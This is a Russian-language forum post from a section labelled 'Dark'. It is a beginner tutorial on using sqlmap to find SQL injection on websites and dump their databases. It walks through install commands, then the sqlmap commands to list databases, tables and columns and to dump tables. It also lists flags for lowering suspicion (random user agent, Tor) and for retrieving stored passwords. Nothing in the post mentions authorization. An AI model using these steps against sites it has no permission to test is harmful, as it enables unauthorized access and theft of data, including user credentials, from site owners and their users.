Скачать mysql с сайта

Тема в разделе "Dark", создана пользователем Транклюкатор, 7 янв 2021.

Метки:
  1. Транклюкатор

    Транклюкатор Господин ПЖ

    [​IMG]

    Всем привет, сегодня мы с вами поговорим о такой утилите как sqlmap, и как же слить базы данных с сайта.

    [​IMG]
    Sqlmap - одна из утилит пентеста, которая автоматизирует процесс поиска и эксплуатации SQL-инъекций с целью извлечения данных или захвата удаленного хоста. Эта статья будет вводной, так как расписать весь функционал этой утилиты невозможно.

    Установка :

    apt update
    apt upgrade
    apt install python2
    apt install git
    git clone sqlmapproject/sqlmap
    cd sqlmap

    Готово, на этом установка закончена, теперь мы разберемся с вариантами запуска :

    [​IMG]
    python2 sqlmap.py -u "url сайта без кавычек" —dbs

    Эта команда произведет проверку на уязвимость, и выдаст список баз
    python2 sqlmap.py -u "опять же url сайта без кавычек" —dbs —risk(1/3)/level(1/5)

    Эта команда уже будет копать глубже, а функция как и у первой. (риск и уровень на ваш выбор)
    Далее, если вам всё-таки удалось выявить базу данных, то ее можно посмотреть с помощью команды :

    python2 sqlmap.py -u "url сайта без кавычек" -D "название базы данных без кавычек" —tables

    [​IMG]
    Если вас заинтересовала какая-либо из колонок бд ,то пишем:

    python2 sqlmap.py -u "url сайта без кавычек" -D "название базы данных без кавычек" -T "название таблицы без кавычек" —columns

    Если вы хотите дампнуть (скачать) базу данных :

    python2 sqlmap.py -u "url сайта без кавычек" -D "название базы данных без кавычек" -T "название таблицы без кавычек" —dump

    Путь сохранения вам выдастся в конце операции.

    И ещё что я хотел бы написать в этой статье, это небольшая пояснялка, некоторые ключи :

    -u для указания URL-random-agent для снижения подозрительной активности-tor для использования защищенного канала-dbs смотрим какие базы доступны-table смотрим таблицу-columns смотрим колонки-dump скачиваем путь к базе-current-user инфо базы данных, включая ее название, номер версии, а также текущего пользователя-passwords сохраненные пароли в базе-level Эта опция требует аргумента, который определяет уровень тестов для выполнения. Существует пять уровней. Значение по умолчанию — 1, где выполняется ограниченное количество тестов (запросов). Напротив, уровень 5 будет тестировать гораздо больше скриптов и границ.
    Ну а на этом я закончу, статья пилотная, если вам понравится эта статья, то могу продемонстрировать пример использования данной утилиты. Всем спасибо за внимание! С наступившим!